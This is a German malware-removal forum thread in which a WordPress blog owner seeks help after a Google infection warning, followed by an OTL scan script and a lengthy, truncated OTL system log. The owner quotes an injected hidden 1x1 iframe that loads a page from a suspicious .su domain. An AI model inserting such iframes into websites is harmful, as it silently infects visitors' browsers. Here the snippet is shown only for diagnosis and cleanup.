| |
| |||||||
Log-Analyse und Auswertung: Wordpress Blog infiziert Mail von Google erhaltenWindows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML. |
 |
28.02.2013, 18:38
| #1 |
 |  Wordpress Blog infiziert Mail von Google erhalten Hallo Leute, ich habe von Google eine Mail erhalten, dass mein Blog infiziert ist. Habe einen Code Schnipsel entdeckt, der mir höchst verdächtig vorkommt, habe ihn gegooglet und nur 4 Anfragen bekommen, sie hat mich hierher geschickt, leider kann ich auf ne Thread nicht antworten. Es ist dieser Schnipsel: <iframe src="hxxp://sraphicshouldn.su/img2/count.htm" width="1" height="1" frameborder="0"></iframe></div> sollte ich diesen löschen? Bitte um schnelle Hilfe, bin am verzweifeln |
|
28.02.2013, 19:10
| #2 |
| /// Malware-holic   | Wordpress Blog infiziert Mail von Google erhalten kannst mal den link zum blog posten?
__________________
__________________ |
|
28.02.2013, 19:28
| #3 |
| | Wordpress Blog infiziert Mail von Google erhalten hi, ja gerne, ich vermute, dass es mehr ist. Hab jetzt ein paar dieser Schnipsel gefundne und entfernt, aber sicherlich ist damit nicht alles getan.
__________________Drucker Guide » Maintenance Mode ist die seite hab sie auf maintenance gesetzt. |
|
28.02.2013, 19:33
| #4 |
| /// Malware-holic | Wordpress Blog infiziert Mail von Google erhalten welche wordpress version wird genutzt?
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
|
28.02.2013, 19:54
| #5 |
| | Wordpress Blog infiziert Mail von Google erhalten Es handelt sich um die Version 3.5.1 Übrigens kenne ich mich nicht aus mit Programmierung und PHP, also eine Noob Hilfe wäre super :-) Danke für die schnelle Hilfe, mein Hoster hat immernoch nicht geantwortet. Wenn ich bei wordpress auf dashboard klicke wird komischerweise nichts mehr angezeigt, weis nicht ob das am Wartungsmodus liegen könnte... Ich habe die Dateien runtergeladen und mit Spyware Terminator gescannt, der hat aber nix gefunden. Ich weis nichtmal, ob ich das richtig gemacht habe, bitte um Hilfe :-( |
|
28.02.2013, 21:25
| #6 |
| /// Malware-holic | Wordpress Blog infiziert Mail von Google erhalten spyware terminator kannst auch deinstalieren. File-Upload.net - Ihr kostenloser File Hoster! lad mir mal da deine Dateien vom blog hoch und send mir den link als private nachicht. wie siehts passwort mäßig aus, schweres oder eher leichtes? jetzt sehen wir uns deinen pc an: Falls noch nicht vorhanden, lade Dir bitte OTL von Oldtimer herunter und speichere es auf Deinem Desktop
Code:
ATTFilter activex
netsvcs
msconfig
%SYSTEMDRIVE%\*.
%PROGRAMFILES%\*.exe
%LOCALAPPDATA%\*.exe
%systemroot%\*. /mp /s
C:\Windows\system32\*.tsp
/md5start
userinit.exe
eventlog.dll
scecli.dll
netlogon.dll
cngaudit.dll
ws2ifsl.sys
sceclt.dll
ntelogon.dll
winlogon.exe
logevent.dll
user32.DLL
explorer.exe
iaStor.sys
nvstor.sys
atapi.sys
IdeChnDr.sys
viasraid.sys
AGP440.sys
vaxscsi.sys
nvatabus.sys
viamraid.sys
nvata.sys
nvgts.sys
iastorv.sys
ViPrt.sys
eNetHook.dll
ahcix86.sys
KR10N.sys
nvstor32.sys
ahcix86s.sys
/md5stop
%systemroot%\system32\drivers\*.sys /lockedfiles
%systemroot%\System32\config\*.sav
%systemroot%\system32\*.dll /lockedfiles
%USERPROFILE%\*.*
%USERPROFILE%\Local Settings\Temp\*.exe
%USERPROFILE%\Local Settings\Temp\*.dll
%USERPROFILE%\Application Data\*.exe
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems|Windows /rs
CREATERESTOREPOINT
__________________ --> Wordpress Blog infiziert Mail von Google erhalten |
|
28.02.2013, 22:50
| #7 |
| | Wordpress Blog infiziert Mail von Google erhalten Hi, also hier schonmal die Scans, hab nur leider unten rechts in der Leiste Avira offen gelassen, hoffe nicht schlimm :/ Der Scan hat ewig gedauert und lies sich nicht abbrechen. Code:
ATTFilter OTL logfile created on: 28.02.2013 21:56:57 - Run 1 OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\DBoy\Desktop Windows Vista Home Premium Edition Service Pack 1 (Version = 6.0.6001) - Type = NTWorkstation Internet Explorer (Version = 7.0.6001.18000) Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy 3,00 Gb Total Physical Memory | 1,98 Gb Available Physical Memory | 66,15% Memory free 6,19 Gb Paging File | 5,16 Gb Available in Paging File | 83,38% Paging File free Paging file location(s): ?:\pagefile.sys [binary data] %SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files Drive C: | 286,37 Gb Total Space | 144,67 Gb Free Space | 50,52% Space Free | Partition Type: NTFS Computer Name: DBOY-PC | User Name: DBoy | Logged in as Administrator. Boot Mode: Normal | Scan Mode: Current user | Quick Scan Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days ========== Processes (SafeList) ========== PRC - [2013.02.28 21:28:31 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\DBoy\Desktop\OTL.exe PRC - [2013.02.12 17:16:48 | 000,086,752 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\sched.exe PRC - [2013.02.12 17:16:13 | 000,565,472 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE PRC - [2013.02.12 17:16:12 | 000,079,584 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\avshadow.exe PRC - [2013.02.12 17:16:11 | 000,385,248 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\avgnt.exe PRC - [2013.02.12 17:16:11 | 000,110,816 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\avguard.exe PRC - [2013.02.12 07:48:04 | 000,587,912 | ---- | M] (Crawler.com) -- C:\Program Files\Spyware Terminator\st_rsser.exe PRC - [2013.02.12 07:48:00 | 003,674,248 | ---- | M] (Crawler.com) -- C:\Program Files\Spyware Terminator\SpywareTerminatorUpdate.exe PRC - [2013.02.12 07:47:48 | 002,777,736 | ---- | M] (Crawler.com) -- C:\Program Files\Spyware Terminator\SpywareTerminatorShield.exe PRC - [2012.12.14 10:17:04 | 003,467,768 | ---- | M] (TeamViewer GmbH) -- C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe PRC - [2012.11.12 06:59:56 | 000,033,136 | ---- | M] () -- C:\Windows\ASScrPro.exe PRC - [2012.10.29 17:33:28 | 001,573,584 | ---- | M] (Ask) -- C:\Program Files\Ask.com\Updater\Updater.exe PRC - [2012.07.27 21:51:26 | 000,063,960 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe PRC - [2012.06.13 13:32:04 | 000,222,720 | ---- | M] () -- C:\Program Files\EazelBar\ToolbarUpdaterService.exe PRC - [2009.02.04 18:55:38 | 000,548,864 | ---- | M] () -- C:\Windows\Samsung\PanelMgr\SSMMgr.exe PRC - [2008.10.29 07:29:41 | 002,927,104 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe PRC - [2008.07.16 12:01:00 | 006,253,088 | ---- | M] (Realtek Semiconductor) -- C:\Windows\RtHDVCpl.exe PRC - [2008.07.15 20:29:00 | 007,651,328 | ---- | M] (ASUS) -- C:\Program Files\ASUS\ATKOSD2\ATKOSD2.exe PRC - [2008.06.25 04:01:08 | 000,159,744 | ---- | M] (ASUS) -- C:\Program Files\ASUS\ATK Media\DMedia.exe PRC - [2008.04.01 08:09:30 | 000,266,240 | ---- | M] (ASUSTek Computer Inc.) -- C:\Program Files\ASUS\ASUS Data Security Manager\ADSMTray.exe PRC - [2008.03.31 11:55:48 | 000,225,280 | ---- | M] (ASUSTek Computer Inc.) -- C:\Program Files\ASUS\ASUS Data Security Manager\ADSMSrv.exe PRC - [2007.11.30 20:20:44 | 000,051,768 | ---- | M] () -- C:\Program Files\ASUS\ASUS Live Update\ALU.exe PRC - [2007.10.12 06:44:28 | 000,106,496 | ---- | M] (ASUS) -- C:\Windows\System32\ASUSTPE.exe PRC - [2007.08.08 09:08:40 | 000,094,208 | ---- | M] () -- C:\Program Files\ATKGFNEX\GFNEXSrv.exe ========== Modules (No Company Name) ========== MOD - [2012.11.28 14:13:52 | 000,087,952 | ---- | M] () -- C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll MOD - [2012.11.28 14:13:30 | 001,242,512 | ---- | M] () -- C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll MOD - [2012.11.16 18:04:34 | 000,025,600 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\Accessibility\d9228d58804dfd75fd92a4d12ffac8af\Accessibility.ni.dll MOD - [2012.11.16 18:04:32 | 000,771,584 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\1ba19f8efcff8ad7f972aa38ab9a15f5\System.Runtime.Remoting.ni.dll MOD - [2012.11.16 18:04:27 | 011,800,576 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Web\0a1195c6b5fab213527364c9e8b26ef0\System.Web.ni.dll MOD - [2012.11.16 18:04:09 | 000,971,264 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\aa3e053d433c48e1e8c3f436b4de1ed3\System.Configuration.ni.dll MOD - [2012.11.16 18:02:52 | 005,450,752 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\cfb60f99da570cc494e27e0e8ee747e2\System.Xml.ni.dll MOD - [2012.11.16 18:02:29 | 012,430,848 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\381fb23cb39e1a61e13b8770eb9800ba\System.Windows.Forms.ni.dll MOD - [2012.11.16 18:02:19 | 001,587,200 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\f1aa2385c0109f3059e0e6ba8b58ff68\System.Drawing.ni.dll MOD - [2012.11.16 18:01:04 | 007,950,848 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9dff86a62a525ec8dc827fe9f50298b7\System.ni.dll MOD - [2012.11.16 18:00:33 | 011,490,816 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\0309936a8e1672d39b9cf14463ce69f9\mscorlib.ni.dll MOD - [2012.11.12 06:59:56 | 000,033,136 | ---- | M] () -- C:\Windows\ASScrPro.exe MOD - [2012.11.12 05:46:02 | 001,691,648 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysManager.Graphics.Wizard\2.0.3219.36943__90ba9c70f846762e\CLI.Aspect.DisplaysManager.Graphics.Wizard.dll MOD - [2012.11.12 05:46:02 | 000,483,328 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.TransCode.Graphics.Wizard\2.0.3219.37086__90ba9c70f846762e\CLI.Aspect.TransCode.Graphics.Wizard.dll MOD - [2012.11.12 05:46:02 | 000,278,528 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Runtime\2.0.3219.36921__90ba9c70f846762e\CLI.Caste.Graphics.Runtime.dll MOD - [2012.11.12 05:46:02 | 000,204,800 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.InfoCentre.Graphics.Wizard\2.0.3219.36946__90ba9c70f846762e\CLI.Aspect.InfoCentre.Graphics.Wizard.dll MOD - [2012.11.12 05:46:02 | 000,077,824 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DeviceTV.Graphics.Runtime\2.0.3219.37053__90ba9c70f846762e\CLI.Aspect.DeviceTV.Graphics.Runtime.dll MOD - [2012.11.12 05:46:02 | 000,069,632 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DeviceCV.Graphics.Runtime\2.0.3219.37023__90ba9c70f846762e\CLI.Aspect.DeviceCV.Graphics.Runtime.dll MOD - [2012.11.12 05:46:02 | 000,040,960 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Wizard\2.0.3219.36938__90ba9c70f846762e\CLI.Caste.Graphics.Wizard.dll MOD - [2012.11.12 05:46:02 | 000,036,864 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DeviceProperty.Graphics.Runtime\2.0.3219.36998__90ba9c70f846762e\CLI.Aspect.DeviceProperty.Graphics.Runtime.dll MOD - [2012.11.12 05:46:02 | 000,020,480 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.HotkeysHandling.Graphics.Runtime\2.0.3219.36931__90ba9c70f846762e\CLI.Aspect.HotkeysHandling.Graphics.Runtime.dll MOD - [2012.11.12 05:45:45 | 000,135,168 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.Welcome.Graphics.Dashboard\2.0.3219.37088__90ba9c70f846762e\CLI.Aspect.Welcome.Graphics.Dashboard.dll MOD - [2012.11.12 05:45:45 | 000,073,728 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Dashboard\2.0.3219.36930__90ba9c70f846762e\CLI.Caste.Graphics.Dashboard.dll MOD - [2012.11.12 05:45:44 | 000,356,352 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.Radeon3D.Graphics.Dashboard\2.0.3219.37031__90ba9c70f846762e\CLI.Aspect.Radeon3D.Graphics.Dashboard.dll MOD - [2012.11.12 05:45:44 | 000,147,456 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.PowerPlayDPPE.Graphics.Dashboard\2.0.3219.37085__90ba9c70f846762e\CLI.Aspect.PowerPlayDPPE.Graphics.Dashboard.dll MOD - [2012.11.12 05:45:44 | 000,090,112 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.Radeon3D.Graphics.Wizard\2.0.3219.37032__90ba9c70f846762e\CLI.Aspect.Radeon3D.Graphics.Wizard.dll MOD - [2012.11.12 05:45:44 | 000,061,440 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.Radeon3D.Graphics.Runtime\2.0.3219.37030__90ba9c70f846762e\CLI.Aspect.Radeon3D.Graphics.Runtime.dll MOD - [2012.11.12 05:45:44 | 000,045,056 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.PowerPlayDPPE.Graphics.Runtime\2.0.3219.37084__90ba9c70f846762e\CLI.Aspect.PowerPlayDPPE.Graphics.Runtime.dll MOD - [2012.11.12 05:45:43 | 000,811,008 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.MMVideo.Graphics.Dashboard\2.0.3219.37002__90ba9c70f846762e\CLI.Aspect.MMVideo.Graphics.Dashboard.dll MOD - [2012.11.12 05:45:43 | 000,405,504 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.MMVideo.Graphics.Wizard\2.0.3219.37044__90ba9c70f846762e\CLI.Aspect.MMVideo.Graphics.Wizard.dll MOD - [2012.11.12 05:45:42 | 000,081,920 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.MMVideo.Graphics.Runtime\2.0.3219.37001__90ba9c70f846762e\CLI.Aspect.MMVideo.Graphics.Runtime.dll MOD - [2012.11.12 05:45:41 | 000,720,896 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysManager.Graphics.Dashboard\2.0.3219.36933__90ba9c70f846762e\CLI.Aspect.DisplaysManager.Graphics.Dashboard.dll MOD - [2012.11.12 05:45:41 | 000,589,824 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysColour2.Graphics.Dashboard\2.0.3219.36948__90ba9c70f846762e\CLI.Aspect.DisplaysColour2.Graphics.Dashboard.dll MOD - [2012.11.12 05:45:41 | 000,450,560 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DeviceDFP.Graphics.Dashboard\2.0.3219.36993__90ba9c70f846762e\CLI.Aspect.DeviceDFP.Graphics.Dashboard.dll MOD - [2012.11.12 05:45:41 | 000,401,408 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DeviceLCD.Graphics.Dashboard\2.0.3219.37021__90ba9c70f846762e\CLI.Aspect.DeviceLCD.Graphics.Dashboard.dll MOD - [2012.11.12 05:45:41 | 000,307,200 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DeviceLCD.Graphics.Wizard\2.0.3219.36954__90ba9c70f846762e\CLI.Aspect.DeviceLCD.Graphics.Wizard.dll MOD - [2012.11.12 05:45:41 | 000,225,280 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.InfoCentre.Graphics.Dashboard\2.0.3219.36947__90ba9c70f846762e\CLI.Aspect.InfoCentre.Graphics.Dashboard.dll MOD - [2012.11.12 05:45:41 | 000,122,880 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysOptions.Graphics.Dashboard\2.0.3219.37017__90ba9c70f846762e\CLI.Aspect.DisplaysOptions.Graphics.Dashboard.dll MOD - [2012.11.12 05:45:41 | 000,040,960 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysColour2.Graphics.Runtime\2.0.3219.36953__90ba9c70f846762e\CLI.Aspect.DisplaysColour2.Graphics.Runtime.dll MOD - [2012.11.12 05:45:41 | 000,036,864 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysOptions.Graphics.Runtime\2.0.3219.37016__90ba9c70f846762e\CLI.Aspect.DisplaysOptions.Graphics.Runtime.dll MOD - [2012.11.12 05:45:41 | 000,032,768 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DeviceLCD.Graphics.Runtime\2.0.3219.37020__90ba9c70f846762e\CLI.Aspect.DeviceLCD.Graphics.Runtime.dll MOD - [2012.11.12 05:45:40 | 000,438,272 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DeviceCRT.Graphics.Dashboard\2.0.3219.37000__90ba9c70f846762e\CLI.Aspect.DeviceCRT.Graphics.Dashboard.dll MOD - [2012.11.12 05:45:40 | 000,061,440 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DeviceDFP.Graphics.Runtime\2.0.3219.36998__90ba9c70f846762e\CLI.Aspect.DeviceDFP.Graphics.Runtime.dll MOD - [2012.11.12 05:45:40 | 000,040,960 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DeviceCRT.Graphics.Runtime\2.0.3219.37000__90ba9c70f846762e\CLI.Aspect.DeviceCRT.Graphics.Runtime.dll MOD - [2012.11.12 05:45:40 | 000,020,480 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\AEM.Plugin.Hotkeys.Shared\2.0.3184.27499__90ba9c70f846762e\AEM.Plugin.Hotkeys.Shared.dll MOD - [2012.11.12 05:45:40 | 000,020,480 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\AEM.Actions.CCAA.Shared\2.0.3184.27491__90ba9c70f846762e\AEM.Actions.CCAA.Shared.dll MOD - [2012.11.12 05:45:40 | 000,016,384 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\AEM.Plugin.WinMessages.Shared\2.0.3184.27506__90ba9c70f846762e\AEM.Plugin.WinMessages.Shared.dll MOD - [2012.11.12 05:45:40 | 000,016,384 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\AEM.Plugin.GD.Shared\2.0.3184.27533__90ba9c70f846762e\AEM.Plugin.GD.Shared.dll MOD - [2012.11.12 05:45:40 | 000,016,384 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\AEM.Plugin.EEU.Shared\2.0.3184.27509__90ba9c70f846762e\AEM.Plugin.EEU.Shared.dll MOD - [2012.11.12 05:45:40 | 000,016,384 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\AEM.Plugin.DPPE.Shared\2.0.3184.27533__90ba9c70f846762e\AEM.Plugin.DPPE.Shared.dll MOD - [2012.11.12 05:45:40 | 000,006,656 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\atixclib\1.0.0.0__90ba9c70f846762e\atixclib.dll MOD - [2012.11.12 05:45:39 | 000,057,344 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Foundation\2.0.3184.27485__90ba9c70f846762e\CLI.Foundation.dll MOD - [2012.11.12 05:45:39 | 000,045,056 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\DEM.Graphics.I0601\2.0.2573.17685__90ba9c70f846762e\DEM.Graphics.I0601.dll MOD - [2012.11.12 05:45:39 | 000,032,768 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\LOG.Foundation\2.0.3184.27483__90ba9c70f846762e\LOG.Foundation.dll MOD - [2012.11.12 05:45:39 | 000,028,672 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\NEWAEM.Foundation\2.0.3184.27484__90ba9c70f846762e\NEWAEM.Foundation.dll MOD - [2012.11.12 05:45:39 | 000,028,672 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Foundation.XManifest\2.0.3184.27567__90ba9c70f846762e\CLI.Foundation.XManifest.dll MOD - [2012.11.12 05:45:39 | 000,020,480 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\DEM.OS.I0602\2.0.3184.27511__90ba9c70f846762e\DEM.OS.I0602.dll MOD - [2012.11.12 05:45:39 | 000,020,480 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Component.Wizard.Shared\2.0.3184.27503__90ba9c70f846762e\CLI.Component.Wizard.Shared.dll MOD - [2012.11.12 05:45:39 | 000,020,480 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Component.Dashboard.Shared\2.0.3184.27499__90ba9c70f846762e\CLI.Component.Dashboard.Shared.dll MOD - [2012.11.12 05:45:39 | 000,016,384 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\MOM.Foundation\2.0.3184.27510__90ba9c70f846762e\MOM.Foundation.dll MOD - [2012.11.12 05:45:39 | 000,016,384 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\DEM.OS\2.0.3184.27511__90ba9c70f846762e\DEM.OS.dll MOD - [2012.11.12 05:45:39 | 000,016,384 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\DEM.Graphics.I0706\2.0.2743.23304__90ba9c70f846762e\DEM.Graphics.I0706.dll MOD - [2012.11.12 05:45:39 | 000,016,384 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\DEM.Graphics\2.0.3184.27512__90ba9c70f846762e\DEM.Graphics.dll MOD - [2012.11.12 05:45:39 | 000,016,384 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\DEM.Foundation\2.0.2573.17684__90ba9c70f846762e\DEM.Foundation.dll MOD - [2012.11.12 05:45:38 | 000,065,536 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DeviceTV.Graphics.Shared\2.0.3184.27520__90ba9c70f846762e\CLI.Aspect.DeviceTV.Graphics.Shared.dll MOD - [2012.11.12 05:45:38 | 000,061,440 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Shared\2.0.3184.27501__90ba9c70f846762e\CLI.Caste.Graphics.Shared.dll MOD - [2012.11.12 05:45:38 | 000,053,248 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.Radeon3D.Graphics.Shared\2.0.3184.27520__90ba9c70f846762e\CLI.Aspect.Radeon3D.Graphics.Shared.dll MOD - [2012.11.12 05:45:38 | 000,053,248 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.MMVideo.Graphics.Shared\2.0.3184.27518__90ba9c70f846762e\CLI.Aspect.MMVideo.Graphics.Shared.dll MOD - [2012.11.12 05:45:38 | 000,053,248 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DeviceCRT.Graphics.Shared\2.0.3184.27518__90ba9c70f846762e\CLI.Aspect.DeviceCRT.Graphics.Shared.dll MOD - [2012.11.12 05:45:38 | 000,049,152 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DeviceDFP.Graphics.Shared\2.0.3184.27517__90ba9c70f846762e\CLI.Aspect.DeviceDFP.Graphics.Shared.dll MOD - [2012.11.12 05:45:38 | 000,040,960 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.TransCode.Graphics.Shared\2.0.3184.27528__90ba9c70f846762e\CLI.Aspect.TransCode.Graphics.Shared.dll MOD - [2012.11.12 05:45:38 | 000,040,960 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DeviceCV.Graphics.Shared\2.0.3184.27520__90ba9c70f846762e\CLI.Aspect.DeviceCV.Graphics.Shared.dll MOD - [2012.11.12 05:45:38 | 000,032,768 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DeviceProperty.Graphics.Shared\2.0.3184.27509__90ba9c70f846762e\CLI.Aspect.DeviceProperty.Graphics.Shared.dll MOD - [2012.11.12 05:45:38 | 000,028,672 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.PowerPlayDPPE.Graphics.Shared\2.0.3184.27527__90ba9c70f846762e\CLI.Aspect.PowerPlayDPPE.Graphics.Shared.dll MOD - [2012.11.12 05:45:38 | 000,028,672 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysColour2.Graphics.Shared\2.0.3184.27516__90ba9c70f846762e\CLI.Aspect.DisplaysColour2.Graphics.Shared.dll MOD - [2012.11.12 05:45:38 | 000,028,672 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DeviceLCD.Graphics.Shared\2.0.3184.27513__90ba9c70f846762e\CLI.Aspect.DeviceLCD.Graphics.Shared.dll MOD - [2012.11.12 05:45:38 | 000,024,576 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.DisplaysOptions.Graphics.Shared\2.0.3184.27519__90ba9c70f846762e\CLI.Aspect.DisplaysOptions.Graphics.Shared.dll MOD - [2012.11.12 05:45:38 | 000,020,480 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Component.Client.Shared\2.0.3184.27492__90ba9c70f846762e\CLI.Component.Client.Shared.dll MOD - [2012.11.12 05:45:38 | 000,020,480 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.HotkeysHandling.Graphics.Shared\2.0.3184.27514__90ba9c70f846762e\CLI.Aspect.HotkeysHandling.Graphics.Shared.dll MOD - [2012.11.12 05:45:38 | 000,016,384 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Component.Runtime.Shared\2.0.3184.27498__90ba9c70f846762e\CLI.Component.Runtime.Shared.dll MOD - [2012.11.12 05:45:38 | 000,016,384 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Wizard.Shared\2.0.3184.27515__90ba9c70f846762e\CLI.Caste.Graphics.Wizard.Shared.dll MOD - [2012.11.12 05:45:38 | 000,016,384 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Caste.Graphics.Dashboard.Shared\2.0.3184.27513__90ba9c70f846762e\CLI.Caste.Graphics.Dashboard.Shared.dll MOD - [2012.11.12 05:45:37 | 000,028,672 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CustomFormats.Graphics.Shared\2.0.3184.27510__90ba9c70f846762e\CLI.Aspect.CustomFormats.Graphics.Shared.dll MOD - [2012.11.12 05:45:37 | 000,024,576 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\ACE.Graphics.DisplaysManager.Shared\2.0.2573.17685__90ba9c70f846762e\ACE.Graphics.DisplaysManager.Shared.dll MOD - [2012.11.12 05:45:37 | 000,020,480 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\APM.Foundation\2.0.3184.27508__90ba9c70f846762e\APM.Foundation.dll MOD - [2012.11.12 05:45:37 | 000,016,384 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\AEM.Server.Shared\2.0.3184.27499__90ba9c70f846762e\AEM.Server.Shared.dll MOD - [2012.11.12 05:45:34 | 000,005,120 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Component.Systemtray.resources\2.0.3219.37066_de_90ba9c70f846762e\CLI.Component.Systemtray.resources.dll MOD - [2012.11.12 05:45:34 | 000,004,608 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Component.Dashboard.resources\2.0.3219.36926_de_90ba9c70f846762e\CLI.Component.Dashboard.resources.dll MOD - [2012.11.12 05:45:33 | 000,536,576 | ---- | M] () -- C:\Windows\assembly\GAC_MSIL\CLI.Component.Systemtray\2.0.3219.37066__90ba9c70f846762e\CLI.Component.Systemtray.dll MOD - [2012.11.12 